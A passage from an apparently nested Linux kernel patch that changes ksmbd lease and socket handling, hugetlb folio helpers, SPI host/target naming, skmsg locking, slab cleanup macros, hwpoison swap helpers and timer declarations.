+ 	if (S_ISDIR(file_inode(fp->filp)->i_mode)) {
+-		if (!lctx || lctx->version != 2)
++		if (!lctx || lctx->version != 2 ||
++		    (lctx->flags != SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE &&
++		     !lctx->epoch))
+ 			return 0;
+ 	}
+ 
+@@ -1461,8 +1472,9 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		buf->lcontext.LeaseFlags = lease->flags;
+ 		buf->lcontext.Epoch = cpu_to_le16(lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+-		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+-		       SMB2_LEASE_KEY_SIZE);
++		if (lease->flags == SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE)
++			memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
++			       SMB2_LEASE_KEY_SIZE);
+ 		buf->ccontext.DataOffset = cpu_to_le16(offsetof
+ 				(struct create_lease_v2, lcontext));
+ 		buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+@@ -1527,8 +1539,9 @@ struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir)
+ 		lreq->flags = lc->lcontext.LeaseFlags;
+ 		lreq->epoch = lc->lcontext.Epoch;
+ 		lreq->duration = lc->lcontext.LeaseDuration;
+-		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-				SMB2_LEASE_KEY_SIZE);
++		if (lreq->flags == SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE)
++			memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++			       SMB2_LEASE_KEY_SIZE);
+ 		lreq->version = 2;
+ 	} else {
+ 		struct create_lease *lc = (struct create_lease *)cc;
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index 9d4222154dcc0..0012919309f11 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -446,6 +446,10 @@ static int create_socket(struct interface *iface)
+ 		sin6.sin6_family = PF_INET6;
+ 		sin6.sin6_addr = in6addr_any;
+ 		sin6.sin6_port = htons(server_conf.tcp_port);
++
++		lock_sock(ksmbd_socket->sk);
++		ksmbd_socket->sk->sk_ipv6only = false;
++		release_sock(ksmbd_socket->sk);
+ 	}
+ 
+ 	ksmbd_tcp_nodelay(ksmbd_socket);
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index 574b4121ebe3e..8f50c589ad5f4 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -226,6 +226,17 @@ struct ftrace_likely_data {
+ # define __no_kcsan
+ #endif
+ 
++#ifdef __SANITIZE_MEMORY__
++/*
++ * Similarly to KASAN and KCSAN, KMSAN loses function attributes of inlined
++ * functions, therefore disabling KMSAN checks also requires disabling inlining.
++ *
++ * __no_sanitize_or_inline effectively prevents KMSAN from reporting errors
++ * within the function and marks all its outputs as initialized.
++ */
++# define __no_sanitize_or_inline __no_kmsan_checks notrace __maybe_unused
++#endif
++
+ #ifndef __no_sanitize_or_inline
+ #define __no_sanitize_or_inline __always_inline
+ #endif
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 5d6a5f3097cd0..b79097b9070b3 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -659,11 +659,4 @@ static inline bool dma_fence_is_container(struct dma_fence *fence)
+ 	return dma_fence_is_array(fence) || dma_fence_is_chain(fence);
+ }
+ 
+-#define DMA_FENCE_WARN(f, fmt, args...) \
+-	do {								\
+-		struct dma_fence *__ff = (f);				\
+-		pr_warn("f %llu#%llu: " fmt, __ff->context, __ff->seqno,\
+-			 ##args);					\
+-	} while (0)
+-
+ #endif /* __LINUX_DMA_FENCE_H */
+diff --git a/include/linux/gfp_types.h b/include/linux/gfp_types.h
+index d88c46ca82e17..6811ab702e8dc 100644
+--- a/include/linux/gfp_types.h
++++ b/include/linux/gfp_types.h
+@@ -2,6 +2,8 @@
+ #ifndef __LINUX_GFP_TYPES_H
+ #define __LINUX_GFP_TYPES_H
+ 
++#include <linux/bits.h>
++
+ /* The typedef is in types.h but we want the documentation here */
+ #if 0
+ /**
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 1c6f35ba1604f..37eeef9841c4e 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -625,26 +625,50 @@ enum hugetlb_page_flags {
+  */
+ #ifdef CONFIG_HUGETLB_PAGE
+ #define TESTHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++bool folio_test_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		return test_bit(HPG_##flname, private);		\
++	}							\
+ static inline int HPage##uname(struct page *page)		\
+ 	{ return test_bit(HPG_##flname, &(page->private)); }
+ 
+ #define SETHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++void folio_set_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		set_bit(HPG_##flname, private);			\
++	}							\
+ static inline void SetHPage##uname(struct page *page)		\
+ 	{ set_bit(HPG_##flname, &(page->private)); }
+ 
+ #define CLEARHPAGEFLAG(uname, flname)				\
++static __always_inline						\
++void folio_clear_hugetlb_##flname(struct folio *folio)		\
++	{	void *private = &folio->private;		\
++		clear_bit(HPG_##flname, private);		\
++	}							\
+ static inline void ClearHPage##uname(struct page *page)		\
+ 	{ clear_bit(HPG_##flname, &(page->private)); }
+ #else
+ #define TESTHPAGEFLAG(uname, flname)				\
++static inline bool						\
++folio_test_hugetlb_##flname(struct folio *folio)		\
++	{ return 0; }						\
+ static inline int HPage##uname(struct page *page)		\
+ 	{ return 0; }
+ 
+ #define SETHPAGEFLAG(uname, flname)				\
++static inline void						\
++folio_set_hugetlb_##flname(struct folio *folio) 		\
++	{ }							\
+ static inline void SetHPage##uname(struct page *page)		\
+ 	{ }
+ 
+ #define CLEARHPAGEFLAG(uname, flname)				\
++static inline void						\
++folio_clear_hugetlb_##flname(struct folio *folio)		\
++	{ }							\
+ static inline void ClearHPage##uname(struct page *page)		\
+ 	{ }
+ #endif
+@@ -730,18 +754,29 @@ extern unsigned int default_hstate_idx;
+ 
+ #define default_hstate (hstates[default_hstate_idx])
+ 
++static inline struct hugepage_subpool *hugetlb_folio_subpool(struct folio *folio)
++{
++	return (void *)folio_get_private_1(folio);
++}
++
+ /*
+  * hugetlb page subpool pointer located in hpage[1].private
+  */
+ static inline struct hugepage_subpool *hugetlb_page_subpool(struct page *hpage)
+ {
+-	return (void *)page_private(hpage + SUBPAGE_INDEX_SUBPOOL);
++	return hugetlb_folio_subpool(page_folio(hpage));
++}
++
++static inline void hugetlb_set_folio_subpool(struct folio *folio,
++					struct hugepage_subpool *subpool)
++{
++	folio_set_private_1(folio, (unsigned long)subpool);
+ }
+ 
+ static inline void hugetlb_set_page_subpool(struct page *hpage,
+ 					struct hugepage_subpool *subpool)
+ {
+-	set_page_private(hpage + SUBPAGE_INDEX_SUBPOOL, (unsigned long)subpool);
++	hugetlb_set_folio_subpool(page_folio(hpage), subpool);
+ }
+ 
+ static inline struct hstate *hstate_file(struct file *f)
+@@ -828,10 +863,15 @@ static inline pte_t arch_make_huge_pte(pte_t entry, unsigned int shift,
+ }
+ #endif
+ 
++static inline struct hstate *folio_hstate(struct folio *folio)
++{
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
++	return size_to_hstate(folio_size(folio));
++}
++
+ static inline struct hstate *page_hstate(struct page *page)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
+-	return size_to_hstate(page_size(page));
++	return folio_hstate(page_folio(page));
+ }
+ 
+ static inline unsigned hstate_index_to_shift(unsigned index)
+@@ -1042,6 +1082,11 @@ static inline struct hstate *hstate_vma(struct vm_area_struct *vma)
+ 	return NULL;
+ }
+ 
++static inline struct hstate *folio_hstate(struct folio *folio)
++{
++	return NULL;
++}
++
+ static inline struct hstate *page_hstate(struct page *page)
+ {
+ 	return NULL;
+diff --git a/include/linux/hugetlb_cgroup.h b/include/linux/hugetlb_cgroup.h
+index 630cd255d0cfd..241bf4fe701ae 100644
+--- a/include/linux/hugetlb_cgroup.h
++++ b/include/linux/hugetlb_cgroup.h
+@@ -67,54 +67,61 @@ struct hugetlb_cgroup {
+ };
+ 
+ static inline struct hugetlb_cgroup *
+-__hugetlb_cgroup_from_page(struct page *page, bool rsvd)
++__hugetlb_cgroup_from_folio(struct folio *folio, bool rsvd)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
++	struct page *tail;
+ 
+-	if (compound_order(page) < HUGETLB_CGROUP_MIN_ORDER)
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
++	if (folio_order(folio) < HUGETLB_CGROUP_MIN_ORDER)
+ 		return NULL;
+-	if (rsvd)
+-		return (void *)page_private(page + SUBPAGE_INDEX_CGROUP_RSVD);
+-	else
+-		return (void *)page_private(page + SUBPAGE_INDEX_CGROUP);
++
++	if (rsvd) {
++		tail = folio_page(folio, SUBPAGE_INDEX_CGROUP_RSVD);
++		return (void *)page_private(tail);
++	}
++
++	else {
++		tail = folio_page(folio, SUBPAGE_INDEX_CGROUP);
++		return (void *)page_private(tail);
++	}
+ }
+ 
+-static inline struct hugetlb_cgroup *hugetlb_cgroup_from_page(struct page *page)
++static inline struct hugetlb_cgroup *hugetlb_cgroup_from_folio(struct folio *folio)
+ {
+-	return __hugetlb_cgroup_from_page(page, false);
++	return __hugetlb_cgroup_from_folio(folio, false);
+ }
+ 
+ static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_rsvd(struct page *page)
++hugetlb_cgroup_from_folio_rsvd(struct folio *folio)
+ {
+-	return __hugetlb_cgroup_from_page(page, true);
++	return __hugetlb_cgroup_from_folio(folio, true);
+ }
+ 
+-static inline void __set_hugetlb_cgroup(struct page *page,
++static inline void __set_hugetlb_cgroup(struct folio *folio,
+ 				       struct hugetlb_cgroup *h_cg, bool rsvd)
+ {
+-	VM_BUG_ON_PAGE(!PageHuge(page), page);
++	VM_BUG_ON_FOLIO(!folio_test_hugetlb(folio), folio);
+ 
+-	if (compound_order(page) < HUGETLB_CGROUP_MIN_ORDER)
++	if (folio_order(folio) < HUGETLB_CGROUP_MIN_ORDER)
+ 		return;
+ 	if (rsvd)
+-		set_page_private(page + SUBPAGE_INDEX_CGROUP_RSVD,
++		set_page_private(folio_page(folio, SUBPAGE_INDEX_CGROUP_RSVD),
+ 				 (unsigned long)h_cg);
+ 	else
+-		set_page_private(page + SUBPAGE_INDEX_CGROUP,
++		set_page_private(folio_page(folio, SUBPAGE_INDEX_CGROUP),
+ 				 (unsigned long)h_cg);
+ }
+ 
+ static inline void set_hugetlb_cgroup(struct page *page,
+ 				     struct hugetlb_cgroup *h_cg)
+ {
+-	__set_hugetlb_cgroup(page, h_cg, false);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, false);
+ }
+ 
+ static inline void set_hugetlb_cgroup_rsvd(struct page *page,
+ 					  struct hugetlb_cgroup *h_cg)
+ {
+-	__set_hugetlb_cgroup(page, h_cg, true);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, true);
+ }
+ 
+ static inline bool hugetlb_cgroup_disabled(void)
+@@ -151,10 +158,10 @@ extern void hugetlb_cgroup_commit_charge(int idx, unsigned long nr_pages,
+ extern void hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ 					      struct hugetlb_cgroup *h_cg,
+ 					      struct page *page);
+-extern void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-					 struct page *page);
+-extern void hugetlb_cgroup_uncharge_page_rsvd(int idx, unsigned long nr_pages,
+-					      struct page *page);
++extern void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++					 struct folio *folio);
++extern void hugetlb_cgroup_uncharge_folio_rsvd(int idx, unsigned long nr_pages,
++					      struct folio *folio);
+ 
+ extern void hugetlb_cgroup_uncharge_cgroup(int idx, unsigned long nr_pages,
+ 					   struct hugetlb_cgroup *h_cg);
+@@ -181,19 +188,13 @@ static inline void hugetlb_cgroup_uncharge_file_region(struct resv_map *resv,
+ {
+ }
+ 
+-static inline struct hugetlb_cgroup *hugetlb_cgroup_from_page(struct page *page)
++static inline struct hugetlb_cgroup *hugetlb_cgroup_from_folio(struct folio *folio)
+ {
+ 	return NULL;
+ }
+ 
+ static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_resv(struct page *page)
+-{
+-	return NULL;
+-}
+-
+-static inline struct hugetlb_cgroup *
+-hugetlb_cgroup_from_page_rsvd(struct page *page)
++hugetlb_cgroup_from_folio_rsvd(struct folio *folio)
+ {
+ 	return NULL;
+ }
+@@ -253,14 +254,14 @@ hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ {
+ }
+ 
+-static inline void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-						struct page *page)
++static inline void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++						struct folio *folio)
+ {
+ }
+ 
+-static inline void hugetlb_cgroup_uncharge_page_rsvd(int idx,
++static inline void hugetlb_cgroup_uncharge_folio_rsvd(int idx,
+ 						     unsigned long nr_pages,
+-						     struct page *page)
++						     struct folio *folio)
+ {
+ }
+ static inline void hugetlb_cgroup_uncharge_cgroup(int idx,
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 4fbd5d8417111..811d59cf891ba 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -832,6 +832,7 @@ struct vmbus_gpadl {
+ 	u32 gpadl_handle;
+ 	u32 size;
+ 	void *buffer;
++	bool decrypted;
+ };
+ 
+ struct vmbus_channel {
+diff --git a/include/linux/mm_types.h b/include/linux/mm_types.h
+index 247aedb18d5c3..a9c1d611029d1 100644
+--- a/include/linux/mm_types.h
++++ b/include/linux/mm_types.h
+@@ -144,6 +144,7 @@ struct page {
+ 			atomic_t compound_pincount;
+ #ifdef CONFIG_64BIT
+ 			unsigned int compound_nr; /* 1 << compound_order */
++			unsigned long _private_1;
+ #endif
+ 		};
+ 		struct {	/* Second tail page of compound page */
+@@ -264,6 +265,7 @@ struct page {
+  * @_total_mapcount: Do not use directly, call folio_entire_mapcount().
+  * @_pincount: Do not use directly, call folio_maybe_dma_pinned().
+  * @_folio_nr_pages: Do not use directly, call folio_nr_pages().
++ * @_private_1: Do not use directly, call folio_get_private_1().
+  *
+  * A folio is a physically, virtually and logically contiguous set
+  * of bytes.  It is a power-of-two in size, and it is aligned to that
+@@ -311,6 +313,7 @@ struct folio {
+ #ifdef CONFIG_64BIT
+ 	unsigned int _folio_nr_pages;
+ #endif
++	unsigned long _private_1;
+ };
+ 
+ #define FOLIO_MATCH(pg, fl)						\
+@@ -338,6 +341,7 @@ FOLIO_MATCH(compound_mapcount, _total_mapcount);
+ FOLIO_MATCH(compound_pincount, _pincount);
+ #ifdef CONFIG_64BIT
+ FOLIO_MATCH(compound_nr, _folio_nr_pages);
++FOLIO_MATCH(_private_1, _private_1);
+ #endif
+ #undef FOLIO_MATCH
+ 
+@@ -383,6 +387,16 @@ static inline void *folio_get_private(struct folio *folio)
+ 	return folio->private;
+ }
+ 
++static inline void folio_set_private_1(struct folio *folio, unsigned long private)
++{
++	folio->_private_1 = private;
++}
++
++static inline unsigned long folio_get_private_1(struct folio *folio)
++{
++	return folio->_private_1;
++}
++
+ struct page_frag_cache {
+ 	void * va;
+ #if (PAGE_SIZE < PAGE_FRAG_CACHE_MAX_SIZE)
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 9e9794d03c9fc..2c1371320c295 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -2664,7 +2664,9 @@
+ #define PCI_DEVICE_ID_INTEL_QUARK_X1000_ILB	0x095e
+ #define PCI_DEVICE_ID_INTEL_I960	0x0960
+ #define PCI_DEVICE_ID_INTEL_I960RM	0x0962
++#define PCI_DEVICE_ID_INTEL_DSA_SPR0	0x0b25
+ #define PCI_DEVICE_ID_INTEL_CENTERTON_ILB	0x0c60
++#define PCI_DEVICE_ID_INTEL_IAX_SPR0	0x0cfe
+ #define PCI_DEVICE_ID_INTEL_8257X_SOL	0x1062
+ #define PCI_DEVICE_ID_INTEL_82573E_SOL	0x1085
+ #define PCI_DEVICE_ID_INTEL_82573L_SOL	0x108f
+diff --git a/include/linux/pinctrl/pinctrl.h b/include/linux/pinctrl/pinctrl.h
+index 487117ccb1bc2..fb25085d09224 100644
+--- a/include/linux/pinctrl/pinctrl.h
++++ b/include/linux/pinctrl/pinctrl.h
+@@ -206,6 +206,26 @@ extern int pinctrl_get_group_pins(struct pinctrl_dev *pctldev,
+ 				const char *pin_group, const unsigned **pins,
+ 				unsigned *num_pins);
+ 
++/**
++ * struct pinfunction - Description about a function
++ * @name: Name of the function
++ * @groups: An array of groups for this function
++ * @ngroups: Number of groups in @groups
++ */
++struct pinfunction {
++	const char *name;
++	const char * const *groups;
++	size_t ngroups;
++};
++
++/* Convenience macro to define a single named pinfunction */
++#define PINCTRL_PINFUNCTION(_name, _groups, _ngroups)	\
++(struct pinfunction) {					\
++		.name = (_name),			\
++		.groups = (_groups),			\
++		.ngroups = (_ngroups),			\
++	}
++
+ #if IS_ENABLED(CONFIG_OF) && IS_ENABLED(CONFIG_PINCTRL)
+ extern struct pinctrl_dev *of_pinctrl_get(struct device_node *np);
+ #else
+diff --git a/include/linux/regulator/consumer.h b/include/linux/regulator/consumer.h
+index ee3b4a0146119..a9ca87a8f4e61 100644
+--- a/include/linux/regulator/consumer.h
++++ b/include/linux/regulator/consumer.h
+@@ -361,13 +361,13 @@ devm_regulator_get_exclusive(struct device *dev, const char *id)
+ 
+ static inline int devm_regulator_get_enable(struct device *dev, const char *id)
+ {
+-	return -ENODEV;
++	return 0;
+ }
+ 
+ static inline int devm_regulator_get_enable_optional(struct device *dev,
+ 						     const char *id)
+ {
+-	return -ENODEV;
++	return 0;
+ }
+ 
+ static inline struct regulator *__must_check
+diff --git a/include/linux/skbuff.h b/include/linux/skbuff.h
+index d5f888fe0e331..cecd3b6bebb8b 100644
+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -2927,6 +2927,21 @@ static inline void skb_mac_header_rebuild(struct sk_buff *skb)
+ 	}
+ }
+ 
++/* Move the full mac header up to current network_header.
++ * Leaves skb->data pointing at offset skb->mac_len into the mac_header.
++ * Must be provided the complete mac header length.
++ */
++static inline void skb_mac_header_rebuild_full(struct sk_buff *skb, u32 full_mac_len)
++{
++	if (skb_mac_header_was_set(skb)) {
++		const unsigned char *old_mac = skb_mac_header(skb);
++
++		skb_set_mac_header(skb, -full_mac_len);
++		memmove(skb_mac_header(skb), old_mac, full_mac_len);
++		__skb_push(skb, full_mac_len - skb->mac_len);
++	}
++}
++
+ static inline int skb_checksum_start_offset(const struct sk_buff *skb)
+ {
+ 	return skb->csum_start - skb_headroom(skb);
+diff --git a/include/linux/skmsg.h b/include/linux/skmsg.h
+index bd4418377bacf..062fe440f5d09 100644
+--- a/include/linux/skmsg.h
++++ b/include/linux/skmsg.h
+@@ -456,10 +456,12 @@ static inline void sk_psock_put(struct sock *sk, struct sk_psock *psock)
+ 
+ static inline void sk_psock_data_ready(struct sock *sk, struct sk_psock *psock)
+ {
++	read_lock_bh(&sk->sk_callback_lock);
+ 	if (psock->saved_data_ready)
+ 		psock->saved_data_ready(sk);
+ 	else
+ 		sk->sk_data_ready(sk);
++	read_unlock_bh(&sk->sk_callback_lock);
+ }
+ 
+ static inline void psock_set_prog(struct bpf_prog **pprog,
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index cb4b5deca9a9c..b8e77ffc38929 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -198,7 +198,7 @@ void kfree(const void *objp);
+ void kfree_sensitive(const void *objp);
+ size_t __ksize(const void *objp);
+ 
+-DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++DEFINE_FREE(kfree, void *, if (!IS_ERR_OR_NULL(_T)) kfree(_T))
+ 
+ /**
+  * ksize - Report actual allocation size of associated object
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index 8e9054d9f6df0..0ce659d6fcb75 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -376,6 +376,7 @@ extern struct spi_device *spi_new_ancillary_device(struct spi_device *spi, u8 ch
+  * @max_speed_hz: Highest supported transfer speed
+  * @flags: other constraints relevant to this driver
+  * @slave: indicates that this is an SPI slave controller
++ * @target: indicates that this is an SPI target controller
+  * @devm_allocated: whether the allocation of this struct is devres-managed
+  * @max_transfer_size: function that returns the max transfer size for
+  *	a &spi_device; may be %NULL, so the default %SIZE_MAX will be used.
+@@ -460,6 +461,7 @@ extern struct spi_device *spi_new_ancillary_device(struct spi_device *spi, u8 ch
+  * @mem_caps: controller capabilities for the handling of memory operations.
+  * @unprepare_message: undo any work done by prepare_message().
+  * @slave_abort: abort the ongoing transfer request on an SPI slave controller
++ * @target_abort: abort the ongoing transfer request on an SPI target controller
+  * @cs_gpiods: Array of GPIO descs to use as chip select lines; one per CS
+  *	number. Any individual value may be NULL for CS lines that
+  *	are not GPIOs (driven by the SPI controller itself).
+@@ -556,8 +558,12 @@ struct spi_controller {
+ 	/* Flag indicating if the allocation of this struct is devres-managed */
+ 	bool			devm_allocated;
+ 
+-	/* Flag indicating this is an SPI slave controller */
+-	bool			slave;
++	union {
++		/* Flag indicating this is an SPI slave controller */
++		bool			slave;
++		/* Flag indicating this is an SPI target controller */
++		bool			target;
++	};
+ 
+ 	/*
+ 	 * on some hardware transfer / message size may be constrained
+@@ -670,7 +676,10 @@ struct spi_controller {
+ 			       struct spi_message *message);
+ 	int (*unprepare_message)(struct spi_controller *ctlr,
+ 				 struct spi_message *message);
+-	int (*slave_abort)(struct spi_controller *ctlr);
++	union {
++		int (*slave_abort)(struct spi_controller *ctlr);
++		int (*target_abort)(struct spi_controller *ctlr);
++	};
+ 
+ 	/*
+ 	 * These hooks are for drivers that use a generic implementation
+@@ -748,6 +757,11 @@ static inline bool spi_controller_is_slave(struct spi_controller *ctlr)
+ 	return IS_ENABLED(CONFIG_SPI_SLAVE) && ctlr->slave;
+ }
+ 
++static inline bool spi_controller_is_target(struct spi_controller *ctlr)
++{
++	return IS_ENABLED(CONFIG_SPI_SLAVE) && ctlr->target;
++}
++
+ /* PM calls that need to be issued by the driver */
+ extern int spi_controller_suspend(struct spi_controller *ctlr);
+ extern int spi_controller_resume(struct spi_controller *ctlr);
+@@ -784,6 +798,21 @@ static inline struct spi_controller *spi_alloc_slave(struct device *host,
+ 	return __spi_alloc_controller(host, size, true);
+ }
+ 
++static inline struct spi_controller *spi_alloc_host(struct device *dev,
++						    unsigned int size)
++{
++	return __spi_alloc_controller(dev, size, false);
++}
++
++static inline struct spi_controller *spi_alloc_target(struct device *dev,
++						      unsigned int size)
++{
++	if (!IS_ENABLED(CONFIG_SPI_SLAVE))
++		return NULL;
++
++	return __spi_alloc_controller(dev, size, true);
++}
++
+ struct spi_controller *__devm_spi_alloc_controller(struct device *dev,
+ 						   unsigned int size,
+ 						   bool slave);
+@@ -803,6 +832,21 @@ static inline struct spi_controller *devm_spi_alloc_slave(struct device *dev,
+ 	return __devm_spi_alloc_controller(dev, size, true);
+ }
+ 
++static inline struct spi_controller *devm_spi_alloc_host(struct device *dev,
++							 unsigned int size)
++{
++	return __devm_spi_alloc_controller(dev, size, false);
++}
++
++static inline struct spi_controller *devm_spi_alloc_target(struct device *dev,
++							   unsigned int size)
++{
++	if (!IS_ENABLED(CONFIG_SPI_SLAVE))
++		return NULL;
++
++	return __devm_spi_alloc_controller(dev, size, true);
++}
++
+ extern int spi_register_controller(struct spi_controller *ctlr);
+ extern int devm_spi_register_controller(struct device *dev,
+ 					struct spi_controller *ctlr);
+@@ -1162,6 +1206,7 @@ static inline void spi_message_free(struct spi_message *m)
+ extern int spi_setup(struct spi_device *spi);
+ extern int spi_async(struct spi_device *spi, struct spi_message *message);
+ extern int spi_slave_abort(struct spi_device *spi);
++extern int spi_target_abort(struct spi_device *spi);
+ 
+ static inline size_t
+ spi_max_message_size(struct spi_device *spi)
+diff --git a/include/linux/sunrpc/clnt.h b/include/linux/sunrpc/clnt.h
+index c794b0ce4e782..809c23120d548 100644
+--- a/include/linux/sunrpc/clnt.h
++++ b/include/linux/sunrpc/clnt.h
+@@ -131,6 +131,7 @@ struct rpc_create_args {
+ 	const char		*servername;
+ 	const char		*nodename;
+ 	const struct rpc_program *program;
++	struct rpc_stat		*stats;
+ 	u32			prognumber;	/* overrides program->number */
+ 	u32			version;
+ 	rpc_authflavor_t	authflavor;
+diff --git a/include/linux/swapops.h b/include/linux/swapops.h
+index b07b277d6a166..1f59f9edcc241 100644
+--- a/include/linux/swapops.h
++++ b/include/linux/swapops.h
+@@ -409,6 +409,55 @@ static inline bool is_migration_entry_dirty(swp_entry_t entry)
+ }
+ #endif	/* CONFIG_MIGRATION */
+ 
++#ifdef CONFIG_MEMORY_FAILURE
++
++extern atomic_long_t num_poisoned_pages __read_mostly;
++
++/*
++ * Support for hardware poisoned pages
++ */
++static inline swp_entry_t make_hwpoison_entry(struct page *page)
++{
++	BUG_ON(!PageLocked(page));
++	return swp_entry(SWP_HWPOISON, page_to_pfn(page));
++}
++
++static inline int is_hwpoison_entry(swp_entry_t entry)
++{
++	return swp_type(entry) == SWP_HWPOISON;
++}
++
++static inline void num_poisoned_pages_inc(void)
++{
++	atomic_long_inc(&num_poisoned_pages);
++}
++
++static inline void num_poisoned_pages_sub(long i)
++{
++	atomic_long_sub(i, &num_poisoned_pages);
++}
++
++#else  /* CONFIG_MEMORY_FAILURE */
++
++static inline swp_entry_t make_hwpoison_entry(struct page *page)
++{
++	return swp_entry(0, 0);
++}
++
++static inline int is_hwpoison_entry(swp_entry_t swp)
++{
++	return 0;
++}
++
++static inline void num_poisoned_pages_inc(void)
++{
++}
++
++static inline void num_poisoned_pages_sub(long i)
++{
++}
++#endif  /* CONFIG_MEMORY_FAILURE */
++
+ typedef unsigned long pte_marker;
+ 
+ #define  PTE_MARKER_UFFD_WP  BIT(0)
+@@ -503,8 +552,9 @@ static inline struct page *pfn_swap_entry_to_page(swp_entry_t entry)
+ 
+ /*
+  * A pfn swap entry is a special type of swap entry that always has a pfn stored
+- * in the swap offset. They are used to represent unaddressable device memory
+- * and to restrict access to a page undergoing migration.
++ * in the swap offset. They can either be used to represent unaddressable device
++ * memory, to restrict access to a page undergoing migration or to represent a
++ * pfn which has been hwpoisoned and unmapped.
+  */
+ static inline bool is_pfn_swap_entry(swp_entry_t entry)
+ {
+@@ -512,7 +562,7 @@ static inline bool is_pfn_swap_entry(swp_entry_t entry)
+ 	BUILD_BUG_ON(SWP_TYPE_SHIFT < SWP_PFN_BITS);
+ 
+ 	return is_migration_entry(entry) || is_device_private_entry(entry) ||
+-	       is_device_exclusive_entry(entry);
++	       is_device_exclusive_entry(entry) || is_hwpoison_entry(entry);
+ }
+ 
+ struct page_vma_mapped_walk;
+@@ -581,55 +631,6 @@ static inline int is_pmd_migration_entry(pmd_t pmd)
+ }
+ #endif  /* CONFIG_ARCH_ENABLE_THP_MIGRATION */
+ 
+-#ifdef CONFIG_MEMORY_FAILURE
+-
+-extern atomic_long_t num_poisoned_pages __read_mostly;
+-
+-/*
+- * Support for hardware poisoned pages
+- */
+-static inline swp_entry_t make_hwpoison_entry(struct page *page)
+-{
+-	BUG_ON(!PageLocked(page));
+-	return swp_entry(SWP_HWPOISON, page_to_pfn(page));
+-}
+-
+-static inline int is_hwpoison_entry(swp_entry_t entry)
+-{
+-	return swp_type(entry) == SWP_HWPOISON;
+-}
+-
+-static inline void num_poisoned_pages_inc(void)
+-{
+-	atomic_long_inc(&num_poisoned_pages);
+-}
+-
+-static inline void num_poisoned_pages_sub(long i)
+-{
+-	atomic_long_sub(i, &num_poisoned_pages);
+-}
+-
+-#else  /* CONFIG_MEMORY_FAILURE */
+-
+-static inline swp_entry_t make_hwpoison_entry(struct page *page)
+-{
+-	return swp_entry(0, 0);
+-}
+-
+-static inline int is_hwpoison_entry(swp_entry_t swp)
+-{
+-	return 0;
+-}
+-
+-static inline void num_poisoned_pages_inc(void)
+-{
+-}
+-
+-static inline void num_poisoned_pages_sub(long i)
+-{
+-}
+-#endif  /* CONFIG_MEMORY_FAILURE */
+-
+ static inline int non_swap_entry(swp_entry_t entry)
+ {
+ 	return swp_type(entry) >= MAX_SWAPFILES;
+diff --git a/include/linux/timer.h b/include/linux/timer.h
+index 6d18f04ad7039..e338e173ce8bc 100644
+--- a/include/linux/timer.h
++++ b/include/linux/timer.h
+@@ -169,7 +169,6 @@ static inline int timer_pending(const struct timer_list * timer)
+ }
+ 
+ extern void add_timer_on(struct timer_list *timer, int cpu);
+-extern int del_timer(struct timer_list * timer);
+ extern int mod_timer(struct timer_list *timer, unsigned long expires);
+ extern int mod_timer_pending(struct timer_list *timer, unsigned long expires);
+ extern int timer_reduce(struct timer_list *timer, unsigned long expires);
+@@ -184,6 +183,7 @@ extern void add_timer(struct timer_list *timer);
+ 
+ extern int try_to_del_timer_sync(struct timer_list *timer);
+ extern int timer_delete_sync(struct timer_list *timer);
++extern int timer_delete(struct timer_list *timer);
+ 
+ /**
+  * del_timer_sync - Delete a pending timer and wait for a running callback
+@@ -198,7 +198,18 @@ static inline int del_timer_sync(struct timer_list *timer)
+ 	return timer_delete_sync(timer);
+ }
+ 
+-#define del_singleshot_timer_sync(t) del_timer_sync(t)
